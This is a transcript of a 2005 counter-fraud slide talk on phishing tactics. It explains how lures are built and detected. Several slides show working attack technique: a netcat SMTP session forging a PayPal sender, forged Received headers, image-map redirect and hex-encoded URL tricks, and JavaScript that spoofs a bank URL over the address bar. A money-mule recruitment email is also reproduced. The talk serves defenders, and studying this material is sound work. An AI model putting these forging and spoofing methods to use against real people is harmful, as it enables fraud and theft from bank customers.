1 / 24

A Primer on Phishing Tactics

A Primer on Phishing Tactics. Practical Counter-Fraud Solutions. Introduction. About Me: Tod Beardsley, todb@planb-security.net Employed at TippingPoint, a division of 3com Lead Counter-Fraud Engineer About Phishing: Massive growth over the last 18 months.

raanan
Download Presentation

A Primer on Phishing Tactics

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. A Primer on Phishing Tactics Practical Counter-Fraud Solutions

  2. Introduction About Me: Tod Beardsley, todb@planb-security.net Employed at TippingPoint, a division of 3com Lead Counter-Fraud Engineer About Phishing: • Massive growth over the last 18 months. • ChoicePoint and Lexus-Nexus hacks are great targets, but 0wning your mom’s bridge friends is a lot easier. • Very effective at convincing said mom’s friends.

  3. The Lure

  4. The Catch

  5. The Catch continued

  6. Profit! • So now what? Enter the money mules: Dear Future Employee, We have received your contact information from employment agency. My name is Karl Jorgensen, project coordinator and your direct supervisor at Odono Inc. Please read the information below about our company and your job description. Odono Inc. leader in wholesale produce distribution is looking for responsible individuals to be responsible for the areas of shipping operations, customer service, transaction and bank operations. Current openings: Transaction Manager You will receive transfers for our company, send/receive funds. You should have your local bank branch locating near you, so you can withdraw money from your account within several hours. You should have home, work or cell phone number (preferably), so we can contact you immediately. Requirements: * Be able to check your email several times a day * Be able to respond to emails immediately * Be able to work overtime if needed * Be responsible and hard working If you are interested in this position and meet the minimum requirements please visit and register here: http://www.odono.org/jobs.html

  7. E-Mail Trust Building Tactics • Between two and five percent of phishing e-mail is responded to. • Several thousand e-mail addresses are used in a given campaign. • Compare to spam: a typical, successful run of millions of addresses generate a rate of %0.01 or so click throughs. • Phishing click-throughs are qaulified – once hooked, they almost always provide information to the attacker.

  8. E-mail: Forging From Fields • Very complicated task… well, not really. C:\>nc mail.cox-internet.com 25 220 jupiter ESMTP server (InterMail vK.4.04.00.03 201-232-140-20030416 license f e37ca4dbd17753103b2892ad5fc6c09) ready Sat, 4 Jun 2005 02:18:24 -0500 HELO paypal.com 250 fe4.cox-internet.com MAIL From: accounts@paypal.com 250 Sender <accounts@paypal.com> Ok RCPT To: victim@example.com 250 Recipient <victim@example.com> Ok DATA 354 Ok Send data ending with <CRLF>.<CRLF> Dear Valued Customer, Due to a problem with our servers, you need to give us your password right away. Please click here: http://www.paypalk.com Thank you for your continued patronage. . 250 Message received: 20050604071934.TGZA4425.fe4@paypal.com QUIT 221 fe4.cox-internet.com ESMTP server closing connection C:\>

  9. E-mail: Forging Received Fields A normal Received path: Received: (qmail 48182 invoked from network); 18 May 2005 15:46:48 -0000 Received: from outbound2.den.paypal.com (216.113.188.112) by mail.example.com with SMTP; 18 May 2005 15:46:48 -0000 Received: from denweb159.den.paypal.com (denweb159.den.paypal.com [10.191.12.207]) by outbound2.den.paypal.com (Postfix) with SMTP id A9CAC11802C for <customer@example.com>; Wed, 18 May 2005 08:46:47 -0700 (PDT) Received: (qmail 6332 invoked by uid 99); 18 May 2005 15:46:47 -0000 A Slightly Altered Received path: Received: (qmail 68233 invoked from network); 2 Jun 2005 09:36:47 -0000 Received: from s01060010dcf9b811.vc.shawcable.net (24.81.25.151) by mail.example.com with SMTP; 2 Jun 2005 09:36:47 -0000 Received: from paypal.com (smtp1.sc5.paypal.com [64.4.244.74]) by S01060010dcf9b811.vc.shawcable.net with esmtp id ABEFBBB123 for <ageddyn@minitru.org>; Thu, 02 Jun 2005 09:36:35 -0700

  10. E-mail: Evading Anti-Spam • Looks like a regular message…

  11. E-mail: Evading Anti-Spam • But it’s really an inline GIF. Trickiness. This is a multi-part message in MIME format. --------------060608080401000901030005 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit <html><p><font face="Arial"><A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map><img SRC="cid:part1.07060107.05040003@custservice_id_6142187@southtrust.com" border="0" usemap="#rtaiz"></A></a></font></p><p><font color="#FFFFF0">Tennis Warner Bross Alyssa Milano XFL Cheerleaders Metallica </font></p></html> --------------060608080401000901030005 Content-Type: image/gif; name="bergman.GIF" Content-Transfer-Encoding: base64 Content-ID: <part1.07060107.05040003@custservice_id_6142187@southtrust.com> Content-Disposition: inline; filename="bergman.GIF" R0lGODlhYgJrAfOFAAUIAKbK8ICAgABgwACAwCCAwECAwECgwGCgwICgwIDAwP/78AAA/////wAAAAAAACH5BAQAAAAALAAAAABVAmMBAAT/sMlJq7046827/2AojmRpnmiqrmzrvnAsz3Rt33iu73zv/8CgcEgs Go/IpHLJbDqf0Kh0Sq1ar9isdsvter+dhXhMLpvFgYACQQC73/C4/BpAFAiDvH7P7/fngIGCg4QxAQV+ […]

  12. E-Mail: Misdirection and Redirection • Crafted “Automatically generated” links <A HREF="http://222.82.252.206/SouthTrust/">https://www.suntrust.com/update/</A> • Hex-Encoded URLs http://%32%31%30.%32%31%39%2e%32%34%31%2e%31%32%35/%69%6d%61%67%65%73/paypal/cgi-bin/webscrcmd_login.php http://210.219.241.125/images/paypal/cgi-bin/webscrcmd_login.php • Overlapping Area Map Tags <A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map> • Open Redirection Services <A HREF="https://www.southtrust.com/st/PersonalBanking/custdetailsconfirmation"><map name="rtaiz"><area coords="0, 0, 597, 355" shape="rect" href="http://comannd.com:280"></map>

  13. E-Mail: Misdirection and Redirection continued • Obfuscation Services

  14. E-Mail: Cutting Out the Web Site Entirely

  15. Detecting Phishy Links Best and most Draconian: • No HTML rendered e-mail, ever. More realistic: • No hex-encoded printable ASCII characters in domain names • No HTTP link containing “http” more than once. • No nested <A> and <AREA> links. • Correlate obfuscation techniques to From addresses. Is there some reason anti-spam can’t handle this already?

  16. Web Site Trust Building • Once you’re on the page, you’re pretty much compelled to execute. • Pages today are much more cookie-cutter than their e-mail lures. • Sometimes pages don’t match up with the bank; How significant is this? • The pages themselves may suck, but the exploits being used to control the web servers… well they kind of suck too.

  17. The Magic of Copy and Paste • Yes, quite magical. File | Save As | Upload | Done. • Typically the only elements that need touching are perhaps the image locations, some of the javascript source files, and redirect the <FORM> to your PHP form mailer. • Many leave traces of their copying: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0036)http://secure.netbank.com/login.htm --> <HTML><HEAD><TITLE>NetBank Account Login</TITLE>

  18. window.createPopup var vuln_x, vuln_y, vuln_w, vuln_h; function vuln_calc() { var root= document[ (document.compatMode=='CSS1Compat') ? 'documentElement' : 'body' ]; vuln_x= window.screenLeft+72; vuln_y= window.screenTop-20; vuln_w= root.offsetWidth-520; vuln_h= 17; vuln_show(); } var vuln_win; function vuln_pop() { vuln_win= window.createPopup(); vuln_win.document.body.innerHTML= vuln_html; vuln_win.document.body.style.margin= 0; vuln_win.document.body.onunload= vuln_pop; vuln_show(); } function vuln_show() { if (vuln_win) vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h); } var vuln_html= '<div style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https://www.usbank.com/secure/-run</div>

  19. window.createPopup continued

  20. window.createPopup continued Presto Change-o But why bother? • Many sites incorporate this code, probably just due to cookie-cutter practices. • The victims of phishing don’t usually qualify the sites they visit off the Location Bar anyway, or anything else in the browser.

  21. Signed, Sealed… Who Cares? Thank you, Verisign! A more obvious and much easier to forge security seal.

  22. Verisign Spoofery Continued

  23. Conclusions • It is silly to think that users will take care of themselves. A decade of wildly successful spam campaigns prove this. (75% of all Internet e-mail is junk mail today.) • The only reason why people notice phishing is because traditional anti-spam has failed to catch it – partly because the keywords are already in everyone’s “known good” set, and because people whitelist e-mail from their banks. • The overmarketing and near total lack of understanding of SSL is also partly to blame. Browsers are terrible at preventing this out of the box, and this is one thing they ought to be good at. • A billion dollars a year of capital flight kind of sucks, and it’s probably more. • Not all phishers are ID10Ts. Some use very advanced techniques, write effective malware, and deploy very complex networks of SMTP and HTTP relays to conduct their business.

  24. Thank Youtodb@planb-security.net

More Related